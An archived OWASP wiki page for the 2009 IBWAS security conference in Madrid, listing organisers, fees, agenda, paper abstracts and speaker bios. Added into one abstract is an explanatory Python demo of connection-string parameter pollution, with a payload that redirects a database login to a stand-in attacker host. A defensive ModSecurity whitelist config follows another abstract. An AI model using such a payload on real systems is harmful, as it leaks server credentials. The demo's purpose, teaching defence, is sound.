OWASP AppSec Iberia 2009

From OWASP
Revision as of 14:42, 19 December 2009 by Fabio.e.cerullo


1st. Iberic Web Application Security Conference (IBWAS09)


Escuela Universitaria de Ingeniería Técnica de Telecomunicación, Universidad Politécnica de Madrid

www.ibwas.com (official web-site)


Welcome

IBWAS09, the Iberic Web Application Security conference will be held in Madrid (Spain), on the 10th and 11th December 2009.

The conference will take place at the Escuela Universitaria de Ingeniería Técnica de Telecomunicación, Universidad Politécnica de Madrid. The location details can be found here.

Conference proceedings will be published by Springer in the Communications in Computer and Information Science (CCIS) series.

This conference aims to bring together application security experts, researchers, educators and practitioners from the industry, academia and international communities such as OWASP, in order to discuss open problems and new solutions in application security. In the context of this track academic researchers will be able to combine interesting results with the experience of practitioners and software engineers.

In addition to the technical issues of the conference programme, our website provides you with tourist information on the city of Madrid, unique for its cultural and historical richness, lovely surroundings and other nice places to visit around the city.

In this conference we will have two acclaimed keynote speakers. The first one is Bruce Schneier, an internationally renowned security technologist and author. The second is Inspector Jorge Martín from the High Tech Crime Unit of the Spanish National Police.

Who Should Attend IBWAS09:

  • Academics
  • Researchers
  • Lifelong learning educators
  • Technical staff
  • Secondary, vocational, or tertiary educators
  • Professionals from the private and public sector
  • Technologists and Scientists
  • School counsellors, principals and teachers
  • Education policy development representatives
  • General personnel from vocational sectors
  • Student counsellors
  • Career/employment officers
  • Education advisers
  • Student Unions
  • Bridging program lecturers & support staff
  • Library personnel
  • International support and services staff
  • Open learning specialists
  • Application Developers
  • Application Testers and Quality Assurance
  • Application Project Management and Staff
  • Chief Information Officers, Chief Information Security Officers, Chief Technology Officers, Deputies, Associates and Staff
  • Chief Financial Officers, Auditors, and Staff Responsible for IT Security Oversight and Compliance
  • Security Managers and Staff
  • Executives, Managers, and Staff Responsible for IT Security Governance
  • IT Professionals Interested in Improving IT Security

...and any person interested in Web Application and Services Security and Information Security in general.

We look forward to seeing you in Madrid!



Use the #ibwas09 hashtag for your tweets

@ibwas09 Twitter Feed (follow us on Twitter!)

Organization and Program Committee

IBWAS09 Chairs and Organization

Vicente Aguilera Díaz, Internet Security Auditors, OWASP Spain, Spain
Carlos Serrão, ISCTE-IUL Instituto Universitário de Lisboa, OWASP Portugal, Portugal
Fabio Cerullo, OWASP Global Education Committee, OWASP Ireland, Ireland

IBWAS09 Program Committee

André Zúquete, Universidade De Aveiro, Portugal
Candelaria Hernández-Goya, Universidad De La Laguna, Spain
Carlos Costa, Universidade De Aveiro, Portugal
Carlos Ribeiro, Instituto Superior Técnico, Portugal
Eduardo Neves, OWASP Education Committee, OWASP Brazil, Brazil
Francesc Rovirosa i Raduà, Universitat Oberta de Catalunya (UOC), Spain
Gonzalo Álvarez Marañón, Consejo Superior de Investigaciones Científicas (CSIC), Spain
Isaac Agudo, University of Malaga, Spain
Jaime Delgado, Universitat Politecnica De Catalunya, Spain
Javier Hernando, Universitat Politecnica De Catalunya, Spain
Javier Rodríguez Saeta, Barcelona Digital, Spain
Joaquim Castro Ferreira, Universidade de Lisboa, Portugal
Joaquim Marques, Instituto Politécnico de Castelo Branco, Portugal
Jorge Dávila Muro, Universidad Politécnica de Madrid (UPM), Spain
Jorge E. López de Vergara, Universidad Autónoma de Madrid, Spain
José Carlos Metrôlho, Instituto Politécnico de Castelo Branco, Portugal
José Luis Oliveira, Universidade De Aveiro, Portugal
Kuai Hinojosa, OWASP Global Education Committee, New York University, United States
Leonardo Chiariglione, Cedeo, Italy
Leonardo Lemes, Unisinos, Brazil
Manuel Sequeira, ISCTE-IUL Instituto Universitário de Lisboa, Portugal
Marco Vieira, Universidade de Coimbra, Portugal
Mariemma I. Yagüe, University of Málaga, Spain
Miguel Correia, Universidade de Lisboa, Portugal
Miguel Dias, Microsoft, Portugal
Nuno Neves, Universidade de Lisboa, Portugal
Osvaldo Santos, Instituto Politécnico de Castelo Branco, Portugal
Panos Kudumakis, Queen Mary University of London, United Kingdom
Paulo Sousa, Universidade de Lisboa, Portugal
Rodrigo Roman, University of Malaga, Spain
Rui Cruz, Instituto Superior Técnico, Portugal
Rui Marinheiro, ISCTE-IUL Instituto Universitário de Lisboa, Portugal
Sérgio Lopes, Universidade do Minho, Portugal
Tiejun Huang, Peking University, China
Víctor Villagrá, Universidad Politécnica de Madrid (UPM), Spain
Vitor Filipe, Universidade de Trás-os-Montes e Alto Douro, Portugal
Vitor Santos, Microsoft, Portugal
Vitor Torres, Universitat Pompeu Fabra, Spain
Wagner Elias, OWASP Brazil Chapter Leader, Brazil

Registration

Registration is now open!

You can register here

OWASP Membership ($50 annual membership fee) gets you a discount of $50.

Registration fees:

                  Early Registration             Late Registration
                  (until 30th November)          (after 30th November)
Regular           200 euros                      250 euros
OWASP members     150 euros                      200 euros
Students          100 euros                      150 euros

Agenda/Schedule

The event agenda can also be found here

Day 1 - Dec 10th 2009
8:00 - 9:00 Registration (Welcome Desk)
9:00 - 9:30 Welcome to IBWAS’09 Conference
Vicente Aguilera (OWASP Spain), Carlos Serrão (OWASP Portugal), César Benavente Peces (UPM)
Location: Main Auditorium
9:30 - 10:30 Bruce Schneier
Keynote: The Future of the Security Industry
Location: Main Auditorium
10:30 - 11:15 OWASP 3.0 – Where are we going?
Dinis Cruz (OWASP)
Location: Main Auditorium
11:15 - 11:30 Coffee Break
11:30 - 12:30
Research Session 1 (Room 1):
A semantic web approach to share alerts among Security Information Management Systems
(Jorge E. López de Vergara, Víctor A. Villagrá, Pilar Holgado, Elena de Frutos, Iván Sanz)
Building web application firewalls in high availability environments
(Juan Galiana Lara, Àngel Puigventós Gracia)
Industry Session 1 (Room 2):
SQL Injection - how far does the rabbit hole go?
Justin Clarke (Gotham Digital Science)
12:30 - 14:00 Lunch
14:00 - 15:30 Industry Session 2 (Room 1) Industry Session 3 (Room 2)
Microsoft Infosec Team: Security Tools Roadmap
Simon Roses (Microsoft)
Empirical Software Security Assurance
Dave Harper (Fortify Software)
OWASP Top 10 2009
Fabio E. Cerullo (OWASP)
The Business of Rogueware
Luis Corrons (Panda Security)
15:30 - 15:45 Coffee Break
15:45 – 17:15 Industry Session 4 (Room 1) Industry Session 5 (Room 2)
OWASP Logging Project
Marc Chisinevski (OWASP Logging Project)
Cloud Computing Security
Daniele Catteddu (ENISA)
Authentication: choosing a method that fits
Miguel Almeida
Assessing and Exploiting Web Applications with the open-source Samurai Web Testing Framework
Raul Siles (Taddong)


Day 2 - Dec 11th 2009
8:00 - 9:00 Registration (Welcome Desk)
9:00 - 9:15 OWASP Spain and Portugal – The state of the Union
Vicente Aguilera (OWASP Spain), Carlos Serrão (OWASP Portugal)
Location: Main Auditorium
9:15 - 10:15 Jorge Martín
Keynote: TBD
Location: Main Auditorium
10:15 - 10:30 Coffee Break
10:30 - 12:30
Research Session 2 (Room 1):
WASAT - A New Web Authorization Security Analysis Tool
(Alejandro Perez-Villegas, Carmen Torrano-Gimenez, Gonzalo Alvarez)
Connection String Parameter Pollution Attacks
(Chema Alonso, Manuel Fernandez, Alejandro Martin, Antonio Guzmán)
Web Applications Security Assessment in the Portuguese World Wide Web panorama
(Nuno Teodoro, Carlos Serrão)
Industry Session 6 (Room 2):
OWASP O2 Platform - Open Platform for Automating Application Security Knowledge and Workflows
Dinis Cruz (OWASP)
Protection of applications at the enterprise in the real world: from audits to controls
Javier Fernández-Sanguino (Universidad Rey Juan Carlos)
12:30 - 14:00 Lunch
14:00 - 14:45 Industry Session 7 (Room 1) Industry Session 8 (Room 2)
Deploying Secure Web Applications with OWASP Resources
Fabio E. Cerullo (OWASP)
Threat Risk Modelling
Martin Knobloch
14:45 - 15:00 Coffee Break
15:00 - 16:00 What Security in a Liquid Web?
Paulo Querido
Location: Main Auditorium
16:00 - 16:45 Panel Discussion
Topic: Web Application Security: What should Governments do in 2010?
Location: Main Auditorium
16:45 - 17:00 IBWAS'09 Closing
Location: Main Auditorium

Papers

Accepted Papers

A semantic web approach to share alerts among Security Information Management Systems

Jorge E. López de Vergara, Víctor A. Villagrá, Pilar Holgado, Elena de Frutos, Iván Sanz

This paper presents a semantic web-based architecture to share alerts among Security Information Management Systems (SIMS). Such architecture is useful if two or more SIMS from different domains need to know information about alerts happening in the other domains, which is useful for an early response to network incidents. For this, an ontology has been defined to describe the knowledge base of each SIMS that contains the security alerts. These knowledge bases can be queried from other SIMS, using standard semantic web protocols. Two modules have been implemented: one to insert the new security alerts in the knowledge base, and another one to query such knowledge bases. The performance of both modules has been evaluated, providing some results.

[link to presentation]

WASAT - A New Web Authorization Security Analysis Tool

Carmen Torrano-Gimenez , Alejandro Perez-Villegas and Gonzalo Alvarez

WASAT (Web Authentication Security Analysis Tool) is an intuitive and complete application designed for assessing the security of different web-related authentication schemes, namely Basic Authentication and Forms-Based Authentication. WASAT is able to mount dictionary and brute-force attacks of variable complexity against the target web site. Password files incorporate a syntax to generate different password search spaces. An important feature of this tool is that low-signature attacks can be performed in order to avoid detection by anti-brute-force mechanisms. The tool is also platform-independent and multithreaded, allowing the user to take control of the program speed. WASAT provides some features not included in many of the existing similar applications and hardly any of their drawbacks, making it an excellent tool for security analysis.

[link to presentation]

Connection String Parameter Pollution Attacks

Chema Alonso, Manuel Fernandez, Alejandro Martín and Antonio Guzmán

In 2007, the classification of the ten most critical vulnerabilities for the security of a system established that code injection attacks were the second type of attack, behind XSS attacks. Currently, code injection attacks are placed first in this ranking. In fact, the most critical attacks are those that combine XSS techniques to access systems and code injection techniques to access the information. The potential damage associated with this type of threat, the total absence of background and the fact that the solution to mitigate this vulnerability must be implemented by systems administrators and database vendors justify an in-depth analysis to estimate all the possible ways of implementing this attack technique.
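The abstract does not describe the mechanics, so here is an added worked example (not code from the paper or its authors) of the pattern Connection String Parameter Pollution abuses: a web front end concatenates a user-supplied password into a database connection string, and the connection-string parser applies "last occurrence of a key wins" semantics, so a password containing ";" smuggles in extra parameters that override the ones the developer set. The parser below is a stand-in written for this example and models ADO.NET-style quoting rules (double-quoted values, a doubled quote as an escape); the host names db.internal and attacker.example, the user alice and the payload are all constructed for illustration and no database is contacted.

```python
"""Connection String Parameter Pollution (CSPP), illustrated.

Added example, not code from the paper or its authors. It models two things:
  * a web front end that builds a database connection string from the user name
    and password a client submits (the vulnerable pattern CSPP targets), and
  * a connection-string parser with "last occurrence of a key wins" semantics,
    the behaviour of ADO.NET-style connection strings the attack relies on.
No database is contacted; the parser is a stand-in written for this example.
"""


def parse_connection_string(conn: str) -> dict:
    """Parse 'Key=Value;Key=Value' into a dict (keys lower-cased, spaces trimmed).

    A value may be wrapped in double quotes, in which case ';' and '=' inside
    it are literal and a doubled quote ("") stands for one quote character.
    When a key repeats, the later value silently replaces the earlier one.
    """
    params = {}
    i, n = 0, len(conn)
    while i < n:
        eq = conn.find("=", i)
        if eq == -1:
            break
        key = conn[i:eq].strip().lower()
        i = eq + 1
        while i < n and conn[i] == " ":
            i += 1
        if i < n and conn[i] == '"':
            # Quoted value: read up to the closing quote, unescaping "".
            i += 1
            chars = []
            while i < n:
                if conn[i] == '"':
                    if i + 1 < n and conn[i + 1] == '"':
                        chars.append('"')
                        i += 2
                        continue
                    i += 1
                    break
                chars.append(conn[i])
                i += 1
            value = "".join(chars)
            semi = conn.find(";", i)
            i = n if semi == -1 else semi + 1
        else:
            semi = conn.find(";", i)
            if semi == -1:
                value, i = conn[i:].strip(), n
            else:
                value, i = conn[i:semi].strip(), semi + 1
        if key:
            params[key] = value  # last occurrence wins: this is what CSPP abuses
    return params


def build_conn_vulnerable(user: str, password: str) -> str:
    """Vulnerable pattern: untrusted input concatenated into the string."""
    return ("Data Source=db.internal;Initial Catalog=app;"
            f"User ID={user};Password={password}")


def _quote(value: str) -> str:
    """Wrap a value in quotes so separators inside it lose their meaning."""
    return '"' + value.replace('"', '""') + '"'


def build_conn_hardened(user: str, password: str) -> str:
    """Hardened pattern: every untrusted value is quoted before insertion."""
    return ("Data Source=db.internal;Initial Catalog=app;"
            f"User ID={_quote(user)};Password={_quote(password)}")


# Constructed attack payload: the "password" smuggles two extra parameters.
# Against a last-wins parser the repeated Data Source key redirects the
# connection to an attacker host, and Integrated Security=true makes the
# application authenticate there with the web server's own account.
PAYLOAD = 'x;Data Source=attacker.example;Integrated Security=true'


def effective_params(builder, user: str, password: str) -> dict:
    """Return the parameters a last-wins parser would actually act on."""
    return parse_connection_string(builder(user, password))


if __name__ == "__main__":
    for name, builder in (("vulnerable", build_conn_vulnerable),
                          ("hardened", build_conn_hardened)):
        p = effective_params(builder, "alice", PAYLOAD)
        print(f"{name:10s} -> data source={p['data source']!r}, "
              f"integrated security={p.get('integrated security')!r}")
```

Run stand-alone, the vulnerable builder ends up pointing at attacker.example with integrated security enabled, while the hardened builder keeps db.internal and treats the whole payload as the password. In real code, prefer the platform's connection-string builder (for .NET, SqlConnectionStringBuilder) over hand-rolled quoting, and never let a client choose the database credentials at all where the design allows it.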

[link to presentation]


Web Applications Security Assessment in the Portuguese World Wide Web panorama

Nuno Teodoro, Carlos Serrão

Following the EU Information and Communication Technologies agenda, the Portuguese Government has started the creation of many applications, enabling electronic interaction between individuals, companies and the public administration – the e-Government. Due to the Internet open nature and the sensitivity of the data that those applications have to handle, it is important to ensure and assess their security. Financial institutions, such as banks, that nowadays use the WWW as a communication channel with their customers, face the same challenges. The main objective of this paper is to introduce a work that will be performed to assess the security of the financial and public administration sectors web applications. In this paper the authors provide a description of the rationale behind this work that involves the selection of a set of key financial and public administration web applications, the definition and application of a security assessment methodology, and the evaluation the assessment results.

[link to presentation]

Building web application firewalls in high availability environments

Juan Galiana Lara, Àngel Puigventós Gracia

Every day the number of Web applications and Web services increases, due to the migration that is taking place towards this type of environment. In these scenarios it is very common to find all types of vulnerabilities affecting web applications, and traditional methods of protection at the network and transport level are not enough to mitigate them. What is more, there are also situations where the availability of information systems is vital for proper functioning. To protect our systems from these threats, we need a component acting at layer 7 of the OSI model, which includes the HTTP protocol, that allows us to analyze traffic (HTTPS included) and that is easily scalable. To solve these problems, the paper presents the design and implementation of an Open Source application firewall, ModSecurity, emphasizing the use of the positive security model and deployment in high availability environments.
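To make the "positive security model" concrete, here is an added configuration fragment for ModSecurity 2.x (written for this page, not taken from the paper): instead of trying to recognise attacks, it enumerates what a hypothetical /account/transfer endpoint accepts (methods, parameter names and per-parameter formats) and denies everything else. The endpoint, parameter names, formats and rule ids are assumptions chosen for illustration; the high-availability deployment the paper also covers is outside this fragment.

```apache
# Added example of a positive (whitelist) ModSecurity 2.x policy for one
# endpoint. Endpoint, parameter names, formats and rule ids are hypothetical.
SecRuleEngine On
SecRequestBodyAccess On
SecRequestBodyLimit 8192
SecDefaultAction "phase:2,deny,status:403,log"

<Location /account/transfer>
    # Only the expected HTTP methods are allowed on this endpoint.
    SecRule REQUEST_METHOD "!@rx ^(GET|POST)$" \
        "id:100001,phase:1,t:none,deny,status:405,msg:'Method not allowed'"

    # Any parameter name outside the known set is rejected outright,
    # so an unexpected or polluted parameter never reaches the application.
    SecRule ARGS_NAMES "!@rx ^(account_id|amount|memo)$" \
        "id:100002,phase:2,t:none,deny,status:403,msg:'Unexpected parameter'"

    # Each known parameter must match its own strict format.
    SecRule ARGS:account_id "!@rx ^[0-9]{1,12}$" \
        "id:100003,phase:2,t:none,deny,status:403,msg:'account_id must be numeric'"
    SecRule ARGS:amount "!@rx ^[0-9]{1,9}(\.[0-9]{1,2})?$" \
        "id:100004,phase:2,t:none,deny,status:403,msg:'amount must be a decimal number'"
    SecRule ARGS:memo "!@rx ^[A-Za-z0-9 .,-]{0,80}$" \
        "id:100005,phase:2,t:none,deny,status:403,msg:'memo contains disallowed characters'"
</Location>
```

The trade-off the paper's approach implies is maintenance: every new parameter or format change in the application needs a matching rule update, which is why a positive model is usually scoped to a few high-value endpoints and combined with a negative rule set elsewhere. Test such rules first with SecRuleEngine DetectionOnly so legitimate traffic that the whitelist misses shows up in the audit log before requests are blocked.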

[link to presentation]

Speakers

Keynote Speakers

Bruce Schneier

Keynote: The Future of the Security Industry

Bruce Schneier is an internationally renowned security technologist and author. Described by The Economist as a "security guru," he is best known as a refreshingly candid and lucid security critic and commentator. When people want to know how security really works, they turn to Schneier.

His first bestseller, Applied Cryptography, explained how the arcane science of secret codes actually works, and was described by Wired as "the book the National Security Agency wanted never to be published." His book on computer and network security, Secrets and Lies, was called by Fortune "[a] jewel box of little surprises you can actually use." Beyond Fear tackles the problems of security from the small to the large: personal safety, crime, corporate security, national security. His current book, Schneier on Security, offers insight into everything from the risk of identity theft (vastly overrated) to the long-range security threat of unchecked presidential power and the surprisingly simple way to tamper-proof elections.

Regularly quoted in the media, he has testified on security before the United States Congress on several occasions and has written articles and op eds for many major publications, including The New York Times, The Guardian, Forbes, Wired, Nature, The Bulletin of the Atomic Scientists, The Sydney Morning Herald, The Boston Globe, The San Francisco Chronicle, and The Washington Post.

Schneier also publishes a free monthly newsletter, Crypto-Gram, with over 150,000 readers. In its ten years of regular publication, Crypto-Gram has become one of the most widely read forums for free-wheeling discussions, pointed critiques, and serious debate about security. As head curmudgeon at the table, Schneier explains, debunks, and draws lessons from security stories that make the news.

Schneier is the Chief Security Technology Officer of BT.

Jorge Martín

Jorge Martín is an inspector of the Spanish National Police, and currently the Head of the Logical Security Group from the High-Tech Crime Unit in the Comisaria General de Policía Judicial.

He is a Computer Systems Technical Engineer and for the past five years has dedicated himself to police investigation in the technological area, focusing his activity on crimes related to intrusions, different types of attacks, malware creation and dissemination and other related issues. He also has extensive experience in the field of computer forensics.

He has participated in different courses and conferences, both in Spain and abroad. He regularly takes part in training initiatives with other law enforcement agencies in different countries, in several Interpol projects on technological investigation techniques and in different European Union studies on the obtaining and handling of digital evidence.

Panel Speakers

Justin Clarke

Title: SQL Injection - how far does the rabbit hole go?

Abstract: SQL Injection has been around for over 10 years, and yet to this day it is still not truly understood by many security professionals and developers. With the recent mass attacks against sites across the world, and well-publicised data breaches with SQL Injection as a component, it has again come to the fore of vulnerabilities under the spotlight; however, many consider it to be only a data access issue, or parameterized queries to be a panacea. This talk explores the deeper, darker areas of SQL Injection: hybrid attacks, SQL Injection worms, and exploiting database functionality. It also explores what kinds of things we can expect in future.

Bio: Justin Clarke is a co-founder and Director at Gotham Digital Science, based in the United Kingdom. He has over twelve years of experience in assessing the security of networks, web applications, and wireless networks for large financial, retail, technology and government clients in the United States, the United Kingdom and New Zealand. Justin is the lead author and technical editor of "SQL Injection Attacks and Defense" (Syngress 2009), co-author of "Network Security Tools: Writing, Hacking, and Modifying Security Tools" (O'Reilly 2005), and a contributing author to "Network Security Assessment: Know Your Network, 2nd Edition" (O'Reilly 2007), as well as a speaker at a number of conferences and events on security topics, including Black Hat USA, BruCON, EuSecWest, OSCON, ISACA, RSA, SANS, OWASP, and the British Computer Society. He is the author of the open source SQLBrute blind SQL injection testing tool, and is the Chapter Leader for the London chapter of OWASP.

[link to presentation]

Dinis Cruz

Title: OWASP O2 Platform - Open Platform for automating application security knowledge and workflows

Abstract: In this talk Dinis Cruz will show the OWASP O2 Platform, an open source toolkit specifically designed for developers and security consultants to perform quick, effective and thorough 'source-code-driven' application security reviews. The OWASP O2 Platform (http://www.owasp.org/index.php/OWASP_O2_Platform) consumes results from the scanning engines of Ounce Labs, Microsoft's CAT.NET tool, FindBugs, CodeCrawler and AppScan DE, and also provides limited support for Fortify and OWASP WebScarab dumps. In the past, there has been a very healthy skepticism about the usability of source code analysis engines for finding commonly found vulnerabilities in real world applications. This presentation will show that, with some creative and powerful tools, it IS possible to use O2 to discover those issues. This presentation will also show O2's advanced support for Struts and Spring MVC.

Bio: Dinis Cruz is the Chief OWASP Evangelist and a Security Consultant based in London (UK), specialized in ASP.NET Application Security, Active Directory deployments, Application Security audits and .NET Security Curriculum Development. Since the 1.1 release of the .Net Framework, Dinis has been one of the strongest proponents of the need to write .Net applications that can be executed in secure Partially Trusted .Net environments, and has done extensive research on: rooting the CLR, exposing the dangers of Full Trust Asp.Net code, Type Confusion vulnerabilities in Full Trust (i.e. non-verifiable) code, creating .Net Security Protection Layers and using Reflection to dynamically manipulate .Net client applications. Dinis is the current [Owasp .Net Project] and [OWASP Autumn of Code] project leader and the main developer of several OWASP .Net tools ([SAM'SHE], [ANBS], [SiteGenerator], Owasp Report Generator, [Asp.Net Reflector]). Dinis is an active trainer on .Net security, having written and delivered courses for IOActive, Foundstone, Intense School and KPMG. His latest course is the two-day training course [Advanced Asp.Net Exploits and Countermeasures], which was delivered at the Black Hat 2006 conference and will be presented at the forthcoming [OWASP AppSec Conference] in Seattle.

link to presentation

Luis Corrons

Title: The Business of Rogueware

Abstract: The underground cybercrime economy has grown significantly in size and complexity over the past couple of years due to a variety of factors, including the rise of social media tools, the global economic slowdown, and an increase in the total number of internet users. For the past 3 years, PandaLabs has monitored the ever-evolving cybercrime economy to discover its tactics, tools, participants, motivations and victims, to understand the full extent of criminal activities and ultimately bring an end to the offenses. In October of 2008, PandaLabs published findings from a comprehensive study on the rogueware economy which concluded that the cybercriminals behind fake antivirus software applications were generating upwards of $15 million per month. In July of 2009, it released a follow-on study that showed monthly earnings had more than doubled to approximately $34 million through rogueware attacks distributed via Facebook, MySpace, Twitter, Digg and targeted Blackhat SEO. This session will reveal the latest results from PandaLabs' ongoing study of the cybercrime economy by illustrating the latest malware strategies used by criminals and examining the changes in their attack strategies over time. The goal of this presentation is to raise awareness of this growing underground economy.

Bio: Luis Corrons has been working for Panda Security since 1999. He started in the technical support department, helping home and corporate users with virus incidents. A year later, he joined the international technical support team, assisting the technical support teams of Panda's partners distributed over 50 countries around the world. In 2002, he became PandaLabs' director as well as malware alerts coordinator in worldwide infection situations, dealing with worms such as Klez, SQLSlammer, Sobig, Blaster, Sasser, Mydoom, etc. During this time, he has coordinated several automated projects related to malware, such as the automatic analysis and response system and the malware automatic information system. He is a speaker at several security conferences such as RSA, Virus Bulletin, SecurityBSides, RAID, etc.

[link to presentation]

Marc Chisinevski

Title: The OWASP Logging Project

Abstract: The goals of the Logging Project are:

  • To provide tools for software developers in order to help them define and provide meaningful logs
  • To provide code audit tools to ensure that log messages are consistent and complete (content, format, timestamps)
  • To facilitate the integration of logs from different sources
  • To facilitate attack reconstruction
  • To facilitate information sharing around security events

The talk will explore these areas, as well as provide details on existing tools and on related OWASP projects. Research directions for the future will also be discussed. A teaser for the presentation (with sound) can be found here: http://animoto.com/play/zel3bnvPCde7tcqBG3e9Cw

Bio: Marc Chisinevski has worked in web application development and security since 2000. Outside his current position as security manager, he is the project lead for the OWASP Logging Project. He is a Certified Information System Security Professional (CISSP) and is active in the opensource community (Asset, inventory and risk management project at http://sourceforge.net/projects/assetmng/). Experienced in malware analysis, Marc also takes part in reverse engineering challenges (http://lists.immunitysec.com/pipermail/dailydave/2009-September/005889.html).

[link to presentation]

Simon Roses

Title: Microsoft Infosec Team: Security Tools Roadmap

Abstract: Microsoft IT's Information Security (InfoSec) group is responsible for information security risk management at Microsoft. We concentrate on the data protection of Microsoft assets, business and enterprise. Our mission is to enable secure and reliable business for Microsoft and its customers. We are an experienced group of IT professionals including architects, developers, program managers and managers. This talk will present different technologies developed by InfoSec to protect Microsoft and released for free, such as CAT.NET, SPIDER, SDR, TAM and SRE, and how they fit into the SDL (Security Development Lifecycle).

Bio: Simon Roses Femerling works at ACE Services from Microsoft, providing security services across Europe. Formerly of PriceWaterhouseCoopers and @Stake, he has many years of security experience, and has authored and cooperated in several security Open Source projects and advisories, such as OWASP Pantera. Mr Roses is a native of Mallorca in the Mediterranean Sea. He holds a postgraduate degree in E-Commerce from Harvard University and a B.S. from Suffolk University in Boston, Massachusetts, and is a frequent speaker at security industry events including RSA, OWASP, DeepSec and Microsoft Security Technets.

[link to presentation]

Dave Harper

Title: Empirical Software Security Assurance

Abstract: By now everyone knows that security must be built in to software; it cannot be bolted on. For more than a decade, scientists, visionaries, and pundits have put forth a multitude of techniques and methodologies for building secure software, but there has been little to recommend one approach over another or to define the boundary between ideas that merely look good on paper and ideas that actually get results. The alchemists and wizards have put on a good show, but it's time to look at the real empirical evidence. This talk examines software security assurance as it is practiced today. We will discuss popular methodologies and then, based on in-depth interviews with leading enterprises such as Adobe, EMC, Google, Microsoft, QUALCOMM, Wells Fargo, and Depository Trust Clearing Corporation (DTCC), present a set of benchmarks for developing and growing an enterprise-wide software security initiative, including but not limited to integration into the software development lifecycle (SDLC). While all initiatives are unique, we find that the leaders share a tremendous amount of common ground and wrestle with many of the same problems. Their lessons can be applied to build a new effort from scratch or to expand the reach of existing security capabilities.

Bio: David Harper is the EMEA Services Director for Fortify Software, the market leader in the fast-growing area of Software Security Assurance (SSA). SSA gives organizations the power to ensure that their entire software portfolio, whether developed internally or acquired through third parties, is secure and free of vulnerabilities that can be exploited by cyber attackers to steal valuable data and cause mayhem. David is responsible for helping Fortify's European customers establish Software Security Assurance programs to systematically reduce application risk. David has extensive experience of defining and implementing Secure Development Life-cycles, whether in response to a security breach or as part of a PCI or other compliance initiative. David has also worked as a security consultant on large e-commerce web sites. Prior to joining Fortify, David held consultancy positions at Macrovision and Entrust Technologies. David has over 20 years of experience in application development and security and is a graduate of Bristol University.

[link to presentation]

Raul Siles

Title: Assessing and Exploiting Web Applications with the open-source Samurai Web Testing Framework

Abstract: The Samurai Web Testing Framework (WTF) is an open-source LiveCD focused on web application security testing. It includes an extensive collection of pre-installed and pre-configured top penetration testing and security analysis tools, making it the perfect environment for assessing and exploiting web applications. The tool categorization guides the analyst through the web-app penetration testing methodology, from reconnaissance to mapping, discovery and exploitation. This talk describes the actively developed Samurai WTF distribution and its tool set, including the recently created Samurai WTF Firefox add-ons collection (which turns the browser into the ultimate pentesting tool), the advanced features provided by the integration of multiple attack tools, plus the new tool update capabilities.

Bio: Raul Siles is a founder and senior security analyst with Taddong. His more than 10 years of expertise performing advanced security services and solutions in various worldwide industries includes security architecture design and reviews, penetration tests, incident handling, forensic analysis, security assessments, and information security research in new technologies such as web applications, wireless, honeynets, virtualization, and VoIP. Raul is one of the few individuals who have earned the GIAC Security Expert (GSE) designation. He is a SANS Institute author and instructor of penetration testing courses, a regular speaker at security conferences, author of security books and articles, and contributes to research and open-source projects. He loves security challenges and is a member of international organizations such as the Honeynet Project, and a handler at the Internet Storm Center (ISC).

[link to presentation]

Miguel Almeida

Title: Authentication: choosing a method that fits

Abstract: Over the last five years, we in the security field have been witnessing an increase in the number of attacks on (web) application users' credentials, and in the refinement and sophistication these attacks have been gaining. There are currently several methods and mechanisms to increase the strength of the authentication process for web applications, both to improve user authentication and to improve transaction authentication. As examples, one can think of adding one-time password tokens, digital certificates, EMV cards, or even SMS one-time codes. However, none of these methods comes for free, nor do they provide perfect security. One must also consider usability penalties, mobility constraints, and, of course, the direct costs of the gadgets. Moreover, there is evidence that not all kinds of attacks can be stopped by even the most sophisticated of these methods. So, where do we stand? What should we choose? What kind of gadgets should we use for our business-critical app, how much will they increase the costs and reduce the risk, and, last but not least, what kind of attacks will we be unable to stop anyway? This presentation will focus on ways to evaluate the pros and cons of adding these improvements, given the current threats.

Bio: Miguel Almeida is an independent computer and network security professional. He has been testing, reviewing and advising on information security for the last ten years. His work has focused on financial institutions and has included engagements where, for a broad view of information security, the technical side as well as the organizational and procedural sides have been analyzed. Before becoming an independent consultant, Miguel worked with Deloitte and KPMG, where he was responsible for the information security practices of these companies. He was a Senior Manager at Deloitte and, before that, a Manager at KPMG. His academic studies include Computer Engineering at Instituto Superior Técnico, and he is a Microsoft Certified Professional [on Windows security].

[link to presentation]

Daniele Catteddu

Title: Cloud Computing: Benefits, risks and recommendations for information security

Abstract: The presentation “Cloud Computing: Benefits, risks and recommendations for information security” will cover some of the most relevant information security implications of cloud computing from the technical, policy and legal perspectives. Information security benefits and top risks will be outlined and, most importantly, concrete recommendations on how to address the risks and maximise the benefits for users will be given.

Bio: Daniele Catteddu, CISM, CISA, is a risk management expert at ENISA, where he is following various activities in the context of the Emerging and Future Risks programme. Recently he has also contributed to the development and testing of information security practices for SMEs. Before joining ENISA, Daniele worked as an Information Security consultant, mainly in the banking and financial sector. He is a speaker at various Information Security conferences and editor of the recently published report Cloud Computing: Benefits, risks and recommendations for information security.

link to presentation

Fabio E Cerullo

Title: OWASP TOP 10 2009

Abstract: The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. The OWASP Top 10 was initially released in 2003, and minor updates were made in 2004 and 2007, followed by this 2010 release. We encourage you to use the Top 10 to get your organization started with application security. Developers can learn from the mistakes of other organizations. Executives can start thinking about how to manage the risk that software applications create in their enterprise.

[link to presentation]

Title: Deploying Secure Web Applications with OWASP Resources

Abstract: Universities are key to making application security visible, and the need to educate software developers about application security as an aspect of proper software development has never been more important. In this presentation I will share how OWASP resources can be used by universities to develop, test and deploy secure web applications. I will discuss the challenges that universities currently face in integrating application security best practices, and describe how OWASP tools and resources are currently used at New York University to test for the most common web application flaws. I will introduce projects such as the OWASP Enterprise Security API, which can be used to mitigate the most common flaws in web applications, and share initiatives the OWASP Global Education Committee is currently working on.

[link to presentation]

Bio: Fabio E Cerullo is currently working as an IT Security Specialist at AIB Bank in Dublin, Ireland. He obtained the Certified Information Systems Security Professional (CISSP) certification in December 2006, which he holds in good standing. Prior to joining AIB, he worked as a Security Engineer at the Symantec Security Response European Headquarters. Security Response provides customers with world-class analysis and protection from viruses, blended threats, security risks and vulnerabilities. While at Symantec, he also collaborated in developing training materials and workshops for parents and teachers on Internet safety. Before moving to Ireland, he worked in different software development and training activities with an emphasis on secure software development in his native Argentina. He holds an MSc in Information Technology from the Catholic University of Buenos Aires, Argentina.

Paulo Querido

Title: What Security in a Liquid Web?

